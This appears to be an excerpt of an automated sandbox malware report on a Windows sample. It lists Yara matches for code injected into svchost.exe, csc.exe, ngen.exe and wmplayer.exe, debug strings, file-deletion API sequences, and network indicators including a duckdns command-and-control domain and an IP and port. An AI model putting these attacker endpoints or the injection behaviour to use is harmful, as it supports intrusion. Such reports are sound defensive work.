              Source: Yara matchFile source: 12.2.svchost.exe.13f4f08c2b8.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.svchost.exe.138aa701bf0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 19.2.ngen.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.svchost.exe.1c2272eb590.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.svchost.exe.20a45700998.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.svchost.exe.138aa68c5a8.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.svchost.exe.13f4f101900.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 13.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.svchost.exe.13f4f08c2b8.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.svchost.exe.138aa701bf0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 24.2.svchost.exe.20a4568b350.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.svchost.exe.1c227360bd8.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 9.2.svchost.exe.138aa68c5a8.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 39.2.svchost.exe.1c2272eb590.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000013.00000002.1399874525.00000000050A7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3811250705.0000000005577000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1528643546.0000013F4F016000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000D.00000002.3800959907.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000013.00000002.1399213491.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.1493095561.0000000002E87000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.1492594141.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000002C.00000002.1577698674.0000000004E4B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000009.00000002.1595202046.00000138AA616000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.1546946748.0000020A45615000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.1623163422.000001C227275000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7964, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8048, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: csc.exe PID: 8164, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: ngen.exe PID: 7544, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: wmplayer.exe PID: 2052, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7920, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 7172, type: MEMORYSTR
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Source: LisectAVT_2403002A_136.exeJoe Sandbox ML: detected
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,13_2_004315EC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,19_2_004315EC
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_004315EC CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,29_2_004315EC
              Source: svchost.exe, 00000009.00000002.1595202046.00000138AA616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_38c90b65-5

              Exploits

              barindex
              Source: Yara matchFile source: 00000009.00000002.1563081980.000001389A606000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1359537990.000002142576F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000018.00000002.1538118774.0000020A35606000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1359537990.0000021425A97000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000027.00000002.1613047804.000001C217577000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.1523488725.0000013F3F317000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: LisectAVT_2403002A_136.exe PID: 7620, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7964, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8048, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7920, type: MEMORYSTR
              Source: LisectAVT_2403002A_136.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdbpte source: svchost.exe, 00000009.00000002.1602454442.00000138B5295000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: svchost.exe, 00000009.00000002.1561024027.0000013898878000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1520877900.0000013F3D2F6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: HC:\Windows\System.Windows.Forms.pdb source: svchost.exe, 00000009.00000002.1556490544.00000003971E2000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1518275274.0000002190312000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.ni.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: System.Drawing.ni.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: \??\C:\Users\user\AppData\Roaming\svchost.PDB source: svchost.exe, 0000000C.00000002.1520877900.0000013F3D2F6000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdbh source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: symbols\dll\System.Windows.Forms.pdb source: svchost.exe, 0000000C.00000002.1518275274.0000002190312000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdbg source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: C:\Windows\Microsoft.VisualBasic.pdbpdbsic.pdb source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Drawing.ni.pdbRSDS source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: !0\??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: svchost.exe, 0000000C.00000002.1518275274.0000002190312000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Xml.ni.pdbRSDS# source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: System.Core.ni.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: Microsoft.VisualBasic.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbvider source: svchost.exe, 0000000C.00000002.1520490428.0000013F3D2B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb`?y source: svchost.exe, 00000009.00000002.1600531424.00000138B5200000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdb` source: WERF9D.tmp.dmp.32.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: svchost.exe, 0000000C.00000002.1520490428.0000013F3D2B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb* H source: svchost.exe, 00000009.00000002.1561362879.00000138988AC000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdbdbpdb source: svchost.exe, 0000000C.00000002.1532137769.0000013F57C73000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdb* source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: xC:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll.pdb source: svchost.exe, 00000009.00000002.1602454442.00000138B5295000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: svchost.exe, 00000009.00000002.1556490544.00000003971E2000.00000004.00000010.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1518275274.0000002190312000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: mscorlib.ni.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 00000009.00000002.1602454442.00000138B5295000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdb*k source: svchost.exe, 0000000C.00000002.1531557318.0000013F57C13000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdb source: svchost.exe, 00000009.00000002.1602148368.00000138B526F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Drawing.pdbUyJ source: WERF9D.tmp.dmp.32.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: C:\Windows\System.Windows.Forms.pdbpdbrms.pdbC:\Windows\System32\OneCoreCommonProxyStub.dll source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdb source: svchost.exe, 0000000C.00000002.1532137769.0000013F57C73000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: System.Xml.ni.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.VisualBasic.pdb source: svchost.exe, 00000009.00000002.1600531424.00000138B5200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1561626202.00000138988D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdbRSDS source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: C:\Windows\System.Windows.Forms.pdbpdbrms.pdb source: svchost.exe, 00000009.00000002.1602454442.00000138B5295000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: mscorlib.pdbP%%=? source: WER81B.tmp.dmp.26.dr, WEREACF.tmp.dmp.21.dr
              Source: Binary string: System.Windows.Forms.pdb.Forms.pdbpdbrms.pdbm.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb? source: svchost.exe, 0000000C.00000002.1518275274.0000002190312000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: 91\??\C:\Windows\System.Windows.Forms.pdb source: svchost.exe, 00000009.00000002.1602454442.00000138B5295000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\System.Windows.Forms.pdb\??\C:\Windows\symbols\dll\mscorlib.pdbShellItem Shell Namespace helper source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.ni.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: System.Configuration.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: \??\C:\Windows\dll\Microsoft.VisualBasic.pdbao source: svchost.exe, 0000000C.00000002.1532137769.0000013F57C73000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Xml.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: System.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb source: svchost.exe, 00000009.00000002.1561626202.00000138988D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1520490428.0000013F3D2B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ()\??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.pdb source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdb source: svchost.exe, 00000009.00000002.1602148368.00000138B526F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1520417366.0000013F3D299000.00000004.00000020.00020000.00000000.sdmp, WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: mscorlib.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: System.Windows.Forms.pdbt source: svchost.exe, 0000000C.00000002.1520417366.0000013F3D299000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\mscorlib.pdbok source: svchost.exe, 00000009.00000002.1561626202.00000138988D7000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdbp+) source: svchost.exe, 00000009.00000002.1556490544.00000003971E2000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: System.Drawing.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: System.Core.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb source: svchost.exe, 00000009.00000002.1602454442.00000138B5295000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Windows.Forms.pdbF9E-7F9C-4437-8B11-F424491E3931}\ServerF9C-4437-8B11-F424491E3931}\InprocServer32 source: svchost.exe, 00000009.00000002.1601737927.00000138B525E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1531557318.0000013F57C6E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.pdb0 source: WERF9D.tmp.dmp.32.dr
              Source: Binary string: System.Windows.Forms.pdb.Forms.pdbpdbrms.pdbm.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.pdb8 source: svchost.exe, 00000009.00000002.1556490544.00000003971E2000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdbn source: svchost.exe, 00000009.00000002.1600531424.00000138B5200000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: Microsoft.VisualBasic.pdbMZ@ source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: symbols\dll\System.Windows.Forms.pdb source: svchost.exe, 00000009.00000002.1556490544.00000003971E2000.00000004.00000010.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\System.Windows.Forms.pdb source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.Configuration.pdbP source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: \??\C:\Windows\symbols\dll\System.Windows.Forms.pdb source: svchost.exe, 0000000C.00000002.1532212647.0000013F57C8F000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: System.ni.pdb source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: Binary string: System.Core.ni.pdbRSDS source: WER81B.tmp.dmp.26.dr, WERF9D.tmp.dmp.32.dr, WEREC17.tmp.dmp.16.dr, WER1AC8.tmp.dmp.35.dr, WEREACF.tmp.dmp.21.dr, WER3015.tmp.dmp.47.dr
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,13_2_0041A01B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,13_2_0040B28E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_0040838E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,13_2_004087A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,13_2_00407848
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_004068CD FindFirstFileW,FindNextFileW,13_2_004068CD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0044BA59 FindFirstFileExA,13_2_0044BA59
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,13_2_0040AA71
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,13_2_00417AAB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,13_2_0040AC78
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,19_2_0041A01B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,19_2_0040B28E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_0040838E
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,19_2_004087A0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,19_2_00407848
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_004068CD FindFirstFileW,FindNextFileW,19_2_004068CD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0044BA59 FindFirstFileExA,19_2_0044BA59
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,19_2_0040AA71
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,19_2_00417AAB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,19_2_0040AC78
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0041A01B FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,29_2_0041A01B
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0040B28E FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,29_2_0040B28E
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0040838E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,29_2_0040838E
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_004087A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,29_2_004087A0
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_00407848 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,29_2_00407848
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_004068CD FindFirstFileW,FindNextFileW,29_2_004068CD
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0044BA59 FindFirstFileExA,29_2_0044BA59
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0040AA71 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,29_2_0040AA71
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_00417AAB FindFirstFileW,FindNextFileW,FindNextFileW,29_2_00417AAB
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0040AC78 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,29_2_0040AC78
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_00406D28 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,13_2_00406D28

              Networking

              barindex
              Source: Malware configuration extractorURLs: Xerverfebarch.duckdns.org
              Source: unknownDNS query: name: windowsserverfebarch.duckdns.org
              Source: global trafficTCP traffic: 192.168.2.9:49711 -> 45.128.223.185:5841
              Source: Joe Sandbox ViewIP Address: 45.128.223.185 45.128.223.185
              Source: Joe Sandbox ViewASN Name: UKSERVERS-ASUKDedicatedServersHostingandCo-Location UKSERVERS-ASUKDedicatedServersHostingandCo-Location
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
